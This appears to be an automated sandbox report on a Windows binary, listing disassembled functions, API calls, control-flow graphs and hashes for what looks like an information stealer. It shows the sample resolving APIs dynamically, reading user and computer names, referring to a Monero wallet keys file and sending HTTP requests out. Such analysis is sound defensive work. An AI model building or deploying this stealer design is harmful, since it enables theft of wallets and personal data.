                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: fa69084b1ebd50339cf777fd99be4abb4d28758e3a8faff5862cc1d2f9b3d25c
                              • Instruction ID: b80a9100788e59a98e35383e9003f1d91a589ada4127d525645c6287aea7d499
                              • Opcode Fuzzy Hash: fa69084b1ebd50339cf777fd99be4abb4d28758e3a8faff5862cc1d2f9b3d25c
                              • Instruction Fuzzy Hash: D6A14CB55046019FD36CDBA9F598D5637F9FF88342B04863EA62E8320CD67EA8C1CB50

                              Control-flow Graph (function fb45c0-fb47a9: RtlAllocateHeap, VirtualProtect; graph edge data omitted)
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FB460E
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00FB479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4638
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB45F3
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB466D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB473F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB45DD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB45D2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB46AC
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4678
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB471E
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB477B
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4683
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4734
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4657
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4662
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4643
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4622
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB46B7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB45C7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB475A
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4770
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB46C2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB46D8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4729
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4765
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB45E8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4713
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB4617
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB474F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB462D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FB46CD
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the 
United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus 
Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: 16420cbbf35280daa98b6e8537a1929d84bf6347a5ea07b8be9770cfc61bd0ec
                              • Instruction ID: f352a9f2d6fbfc68fef9185d3784658e73bbe4d6f593df1b633409bf0db49a3c
                              • Opcode Fuzzy Hash: 16420cbbf35280daa98b6e8537a1929d84bf6347a5ea07b8be9770cfc61bd0ec
                              • Instruction Fuzzy Hash: 2A41E5647C5704EAC66CB7A5884DEDD7B57DFC6F01F68508FA80B52380CA70B900E5A7

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 801 fb4880-fb4942 call fca7a0 call fb47b0 call fca740 * 5 InternetOpenA StrCmpCA 816 fb494b-fb494f 801->816 817 fb4944 801->817 818 fb4ecb-fb4ef3 InternetCloseHandle call fcaad0 call fb9ac0 816->818 819 fb4955-fb4acd call fc8b60 call fca920 call fca8a0 call fca800 * 2 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca920 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca920 call fca8a0 call fca800 * 2 InternetConnectA 816->819 817->816 829 fb4f32-fb4fa2 call fc8990 * 2 call fca7a0 call fca800 * 8 818->829 830 fb4ef5-fb4f2d call fca820 call fca9b0 call fca8a0 call fca800 818->830 819->818 905 fb4ad3-fb4ad7 819->905 830->829 906 fb4ad9-fb4ae3 905->906 907 fb4ae5 905->907 908 fb4aef-fb4b22 HttpOpenRequestA 906->908 907->908 909 fb4b28-fb4e28 call fca9b0 call fca8a0 call fca800 call fca920 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca920 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca920 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca9b0 call fca8a0 call fca800 call fca920 call fca8a0 call fca800 call fca740 call fca920 * 2 call fca8a0 call fca800 * 2 call fcaad0 lstrlen call fcaad0 * 2 lstrlen call fcaad0 HttpSendRequestA 908->909 910 fb4ebe-fb4ec5 InternetCloseHandle 908->910 1021 fb4e32-fb4e5c InternetReadFile 909->1021 910->818 1022 fb4e5e-fb4e65 1021->1022 1023 fb4e67-fb4eb9 InternetCloseHandle call fca800 1021->1023 1022->1023 1024 fb4e69-fb4ea7 call fca9b0 call fca8a0 call fca800 1022->1024 1023->910 1024->1021
                              APIs
                                • Part of subcall function 00FCA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FCA7E6
                                • Part of subcall function 00FB47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FB4839
                                • Part of subcall function 00FB47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FB4849
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00FB4915
                              • StrCmpCA.SHLWAPI(?,00DEEA08), ref: 00FB493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FB4ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00FD0DDB,00000000,?,?,00000000,?,",00000000,?,00DEEAD8), ref: 00FB4DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00FB4E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00FB4E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00FB4E49
                              • InternetCloseHandle.WININET(00000000), ref: 00FB4EAD
                              • InternetCloseHandle.WININET(00000000), ref: 00FB4EC5
                              • HttpOpenRequestA.WININET(00000000,00DEEA18,?,00DEE100,00000000,00000000,00400100,00000000), ref: 00FB4B15
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                                • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                                • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                              • InternetCloseHandle.WININET(00000000), ref: 00FB4ECF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: f5e6772ec4fc7a2796d0bd9b1e5894cb93b83282cf1f1caf070ed9e52df898e0
                              • Instruction ID: dfb2a0ccbbdf62885b74c7e1170082abc22beb138812785f59f82f3f22803364
                              • Opcode Fuzzy Hash: f5e6772ec4fc7a2796d0bd9b1e5894cb93b83282cf1f1caf070ed9e52df898e0
                              • Instruction Fuzzy Hash: A812E47291011DAADB18EB90DE93FEEB339AF14304F5041ADB10662491EF787E49DB62
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FC7910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FC7917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 00FC792F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: 204910939c12d502d0df0fc1bbbfc31b350e1a08adb8f1b32ca04bafa2213fbf
                              • Instruction ID: 13446c0e512c48c067a3abf7bb95c2dbcd8046fc60212a4a61287b2e28cfc113
                              • Opcode Fuzzy Hash: 204910939c12d502d0df0fc1bbbfc31b350e1a08adb8f1b32ca04bafa2213fbf
                              • Instruction Fuzzy Hash: 930162B1904205EFC714DF95D946FAEBBB8FB44B21F10422EE555A3680C77959408BA1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FB11B7), ref: 00FC7880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00FC7887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00FC789F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: a50fbea8f942e7dd736a9b85938afde8b33249938cc435cbc9517f30b3ca4f9d
                              • Instruction ID: 7e7c080114c452236dc700b67ad7df230b750478a740a67b3e8661db04a19792
                              • Opcode Fuzzy Hash: a50fbea8f942e7dd736a9b85938afde8b33249938cc435cbc9517f30b3ca4f9d
                              • Instruction Fuzzy Hash: D4F0A4B1904209AFC714DF84D946FAEBBB8FB04711F10022DF615A3680C77815448BA1
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: 0011fb4f2055730ef30bc980c491acba2c743a7ad7d8eb2e3ce60421f6d509d4
                              • Instruction ID: 0e1ca9d6ee6f7413b388f95b2c99b4b16f1ff373fcd018a324f0db53abb1d830
                              • Opcode Fuzzy Hash: 0011fb4f2055730ef30bc980c491acba2c743a7ad7d8eb2e3ce60421f6d509d4
                              • Instruction Fuzzy Hash: 83D017749002089BCB149AA0A849ADDBB78FB08211F000668D90A62240EA3164828BA5

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 633 fc9c10-fc9c1a 634 fca036-fca0ca LoadLibraryA * 8 633->634 635 fc9c20-fca031 GetProcAddress * 43 633->635 636 fca0cc-fca141 GetProcAddress * 5 634->636 637 fca146-fca14d 634->637 635->634 636->637 638 fca216-fca21d 637->638 639 fca153-fca211 GetProcAddress * 8 637->639 640 fca21f-fca293 GetProcAddress * 5 638->640 641 fca298-fca29f 638->641 639->638 640->641 642 fca2a5-fca332 GetProcAddress * 6 641->642 643 fca337-fca33e 641->643 642->643 644 fca41f-fca426 643->644 645 fca344-fca41a GetProcAddress * 9 643->645 646 fca428-fca49d GetProcAddress * 5 644->646 647 fca4a2-fca4a9 644->647 645->644 646->647 648 fca4dc-fca4e3 647->648 649 fca4ab-fca4d7 GetProcAddress * 2 647->649 650 fca515-fca51c 648->650 651 fca4e5-fca510 GetProcAddress * 2 648->651 649->648 652 fca612-fca619 650->652 653 fca522-fca60d GetProcAddress * 10 650->653 651->650 654 fca67d-fca684 652->654 655 fca61b-fca678 GetProcAddress * 4 652->655 653->652 656 fca69e-fca6a5 654->656 657 fca686-fca699 GetProcAddress 654->657 655->654 658 fca708-fca709 656->658 659 fca6a7-fca703 GetProcAddress * 4 656->659 657->656 659->658
                              APIs
                              • GetProcAddress.KERNEL32(77190000,00DD6090), ref: 00FC9C2D
                              • GetProcAddress.KERNEL32(77190000,00DD5F70), ref: 00FC9C45
                              • GetProcAddress.KERNEL32(77190000,00DE95A8), ref: 00FC9C5E
                              • GetProcAddress.KERNEL32(77190000,00DE9608), ref: 00FC9C76
                              • GetProcAddress.KERNEL32(77190000,00DE95F0), ref: 00FC9C8E
                              • GetProcAddress.KERNEL32(77190000,00DE9A28), ref: 00FC9CA7
                              • GetProcAddress.KERNEL32(77190000,00DDA968), ref: 00FC9CBF
                              • GetProcAddress.KERNEL32(77190000,00DE99C8), ref: 00FC9CD7
                              • GetProcAddress.KERNEL32(77190000,00DE9B60), ref: 00FC9CF0
                              • GetProcAddress.KERNEL32(77190000,00DE9A58), ref: 00FC9D08
                              • GetProcAddress.KERNEL32(77190000,00DE99E0), ref: 00FC9D20
                              • GetProcAddress.KERNEL32(77190000,00DD5F30), ref: 00FC9D39
                              • GetProcAddress.KERNEL32(77190000,00DD5F90), ref: 00FC9D51
                              • GetProcAddress.KERNEL32(77190000,00DD6290), ref: 00FC9D69
                              • GetProcAddress.KERNEL32(77190000,00DD60D0), ref: 00FC9D82
                              • GetProcAddress.KERNEL32(77190000,00DE99B0), ref: 00FC9D9A
                              • GetProcAddress.KERNEL32(77190000,00DE9B78), ref: 00FC9DB2
                              • GetProcAddress.KERNEL32(77190000,00DDAD78), ref: 00FC9DCB
                              • GetProcAddress.KERNEL32(77190000,00DD60F0), ref: 00FC9DE3
                              • GetProcAddress.KERNEL32(77190000,00DE9AB8), ref: 00FC9DFB
                              • GetProcAddress.KERNEL32(77190000,00DE9AA0), ref: 00FC9E14
                              • GetProcAddress.KERNEL32(77190000,00DE9AD0), ref: 00FC9E2C
                              • GetProcAddress.KERNEL32(77190000,00DE9A40), ref: 00FC9E44
                              • GetProcAddress.KERNEL32(77190000,00DD61D0), ref: 00FC9E5D
                              • GetProcAddress.KERNEL32(77190000,00DE9AE8), ref: 00FC9E75
                              • GetProcAddress.KERNEL32(77190000,00DE99F8), ref: 00FC9E8D
                              • GetProcAddress.KERNEL32(77190000,00DE9B30), ref: 00FC9EA6
                              • GetProcAddress.KERNEL32(77190000,00DE9A10), ref: 00FC9EBE
                              • GetProcAddress.KERNEL32(77190000,00DE9A70), ref: 00FC9ED6
                              • GetProcAddress.KERNEL32(77190000,00DE9A88), ref: 00FC9EEF
                              • GetProcAddress.KERNEL32(77190000,00DE9B00), ref: 00FC9F07
                              • GetProcAddress.KERNEL32(77190000,00DE9B18), ref: 00FC9F1F
                              • GetProcAddress.KERNEL32(77190000,00DE9B48), ref: 00FC9F38
                              • GetProcAddress.KERNEL32(77190000,00DE04C8), ref: 00FC9F50
                              • GetProcAddress.KERNEL32(77190000,00DEC258), ref: 00FC9F68
                              • GetProcAddress.KERNEL32(77190000,00DEC300), ref: 00FC9F81
                              • GetProcAddress.KERNEL32(77190000,00DD61F0), ref: 00FC9F99
                              • GetProcAddress.KERNEL32(77190000,00DEC348), ref: 00FC9FB1
